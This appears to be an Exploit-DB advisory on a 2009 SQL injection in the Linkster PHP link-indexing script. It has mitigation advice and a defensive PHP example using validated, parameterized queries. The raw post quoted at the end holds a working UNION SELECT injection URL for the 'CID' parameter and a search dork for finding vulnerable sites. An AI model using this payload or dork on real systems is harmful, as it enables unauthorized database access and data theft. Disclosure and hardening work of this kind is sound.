Vendor: Linkster
By: Angela Zhang
CVSS: 7.5 (HIGH)
SQL Injection (CWE-89)
Product Name: Linkster
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Linkster – a PHP/MySQL link indexing script SQL Injection Vulnerability

The Linkster script is vulnerable to SQL Injection. An attacker can exploit the vulnerability by injecting malicious SQL code in the 'CID' parameter of the linkster.php file. This can lead to unauthorized access to the database and potentially sensitive information leakage.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL Injection attacks. Users are advised to update to the latest version of the script that includes the necessary security patches.
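
One way to apply this mitigation to the 'CID' parameter, as an added example that is not Linkster's own code: the value is validated as a positive integer and then bound into a prepared statement. The function name, the `links` table and its columns are hypothetical, and an in-memory SQLite database with constructed rows stands in for MySQL so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hardened lookup for the CID request parameter (added example).
// Table and column names (links, cid, title, url) are hypothetical.
function links_for_category(PDO $pdo, $rawCid): array
{
    // 1. Allow-list validation: CID must be a positive integer, nothing else.
    $cid = filter_var($rawCid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cid === false) {
        throw new InvalidArgumentException('CID must be a positive integer');
    }
    // 2. Parameterized query: the value is bound, never concatenated into SQL.
    $stmt = $pdo->prepare('SELECT title, url FROM links WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database. A real deployment
// would pass a MySQL PDO handle, ideally with PDO::ATTR_EMULATE_PREPARES off.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT, url TEXT)');
$pdo->exec("INSERT INTO links (cid, title, url) VALUES (6, 'Example', 'http://example.test/')");

// Values as PHP would see them in $_GET['CID'] after URL decoding:
// a legitimate id, the request string from this advisory, and two malformed ids.
$inputs = ['6', '6 AND 1=2 UNION SELECT 1,2,3,4,5,6,version(),8--', '', '6.0'];
foreach ($inputs as $input) {
    try {
        $rows = links_for_category($pdo, $input);
        printf("CID=%s -> %d row(s)\n", var_export($input, true), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("CID=%s -> rejected: %s\n", var_export($input, true), $e->getMessage());
    }
}
```

Only the first input reaches the database; the other three are rejected at validation, and even without that check the bound parameter would be compared as a value rather than parsed as SQL.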

Exploit-DB raw data:

(o)=====================================================================================(o)

         -:-    Linkster - a PHP/MySQL link indexing script  SQL Injection Vulnerability    -:-


                Vendor   : http://gliebster.com
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :   15 - December - 2009

(o)======================================================================================(o)


Dork   :
   
       Powered by Linkster


Vulnerabilities   :

      http://server/path/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--

(o)===========================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , str0ke


(o)===========================================================================================(o)